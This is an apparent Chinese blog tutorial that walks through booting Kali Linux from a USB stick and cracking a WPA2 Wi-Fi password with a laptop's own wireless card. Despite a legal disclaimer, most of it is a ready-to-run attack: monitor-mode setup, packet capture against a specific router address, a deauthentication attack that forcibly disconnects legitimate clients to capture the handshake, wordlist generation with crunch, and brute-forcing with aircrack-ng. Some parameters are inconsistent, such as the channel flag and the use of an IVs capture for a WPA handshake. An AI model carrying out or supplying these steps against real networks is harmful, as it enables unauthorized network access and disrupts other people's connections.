前言：

#请大家遵守网络安全法！本教程仅供学习和教学，切勿做违法的事情，让我们一起做一个守法公民！

这里的无网卡指的是不去上网购买网卡，但是还是需要用到笔记本电脑自带的网卡。这时，我们并不采用虚拟机来开启kali Linux，而是采用制作U盘，用usb启动的方式来打开kali Linux系统，实现笔记本自带网卡的wifi渗透 

那么下面开始教程，史上最详细，小白也会懂 

一．先制作带有kali Linux镜像的U盘 

1.进入kali官网：Get Kali | Kali Linux 

2.下滑会找到 

3.点击live boot 

4.点击此处下载  

5.下载好镜像后继续下载usb制作器Rufus 

下载地址：Rufus - 轻松创建USB启动盘 

6.准备就绪后将Rufus上的选择都按如图选择 

 7. 可能会收到有关ISOHybird图像的提示。选择ISO映像，将允许您从Kali Linux ISO编辑文件，但可能会失去硬件兼容性。因此，我们建议选择 DD 映像。 

 注意：如果选择“DD映像”选项，则可以在USB驱动器上创建另一个分区，从而允许您使用其余空间。开始 ->运行 （Windows + R） -> diskmgmt.msc -> 找到 USB 驱动器 -> 右键单击“未分配” -> 新建简单卷 -> 按照向导的其余部分与下一步，下一步，下一步... 

8.等待加载完后，U盘就制作完成了 

二．Usb启动项启动kali Linux 

这时需要关闭电脑，在点开电源键时疯狂按进入BIOS的按键 

比如：我的电脑是dell，我的BIOS启动是f12，每个牌子的电脑有着不同的进入BIOS的特殊按键，这个需要上网去查。  

进入后页面是这样 

 选择开头是USB的进入（但我的电脑没有显示usb，可能是U盘的问题），即可进入kali Linux系统 

 三．Wifi渗透实验 

1.设置无线网卡监听模式 

首先列出所有可能干扰无线网卡的程序，并终止这些程序：sudo airmon-ng check 

 打开监听（混杂模式），并查看此时无线网卡状态 

sudo airmon-ng start wlan0 

iwconfig 

 此时无线网卡变成了‘wlan0mon’ 

接着重启网卡 

sudo ifconfig wlan0mon down 

sudo iwconfig wlan0mon mode monitor 

sudo ifconfig wlan0mon up 

2.开启探测并抓包 

开启探测：sudo airodump-ng wlan0mon 

得到周围WiFi信息： 

 选取我们要攻击的WiFi，例如backup mac为：8C:DE:F9:25:7A:B8  CH为1 

开始抓包：sudo airodump-ng –ivs –bssid 8C:DE:F9:25:7A:B8 -w longas.txt -c 1 wlan0mon 

 此时，home文件夹里出现了longas.txt-01.ivs文件 

 --bssid 是路由器的mac地址 

-w 是写入到文件longas.txt中0 

-c 11 是频道11 

--ivs 是之抓取可用于破解的iVS数据报文 

3．攻击获得WPA2握手验证数据包 

这里为了获得破解所需的WPA2握手验证的整个完整数据包，我们将会发送一种称之为“deauth”的数据包来将已经连接至无线路由器的合法无线客户端强制断开，此时，客户端就会自动重新连接无线路由器，我们也就有机会捕获到包含WPS2握手验证的完整数据包了。 

接下来就需要进行攻击了：新开一个shell 

sudo aireplay-ng -0 5 -a 8C:DE:F9:25:7A:B8 -c 28:39:26:38:7D:9B wlan0mon 

 -0采用deauth攻击模式，后面跟上攻击次数，这里我设置为5，大家可以根据实际情况设置为1-10不等 

-a后面跟路由器mac地址 

-c后面跟客户端（即连接在此wifi上的某一台设备）的mac地址 

此时抓包界面出现“handshake”，即得到了包含WPA2握手验证的完整数据包longas.txt-01.ivs，结束抓包 

 4．使用crunch得到密码字典 

Crunch是kali Linux自带的程序 

在shell中输入命令： 

crunch 8 8 -t saic%%%% -b 20mb -o START 

 min 设定最小字符串长度 

max 设定最大字符串长度 

-t 指定密码输出的格式 

Crunch特殊字符 

1.%代表数字 

2.^代表特殊符号 

3.@ 代表小写字母 

4.，代表大写符 

-b 指定文件输出的大小为20mb 

-o 将密码保存到指定文件，后面必须为START 

具体参数可参照： 

linuxcrunch命令参数,crunch命令详解 以及使用方法（综合我的经验）_春雪芳菲的博客-CSDN博客 

会生成下面这一长串文件 

 将这一长串重命名得到密码字典 

passwd.txt 

 5．遍历字典破译WiFi密码 

sudo aircrack-ng -w passwd.txt longas.txt-01.ivs 

耐心等候以后得到： 

 结语：为了写这个贴子，我的电脑直接坏了，这个故事告诉我们，没事别随便重启电脑，重启电脑次数多了电脑直接开不开机，我重新刷了机才能打开，原来保存的东西全部丢失，我emo了……………..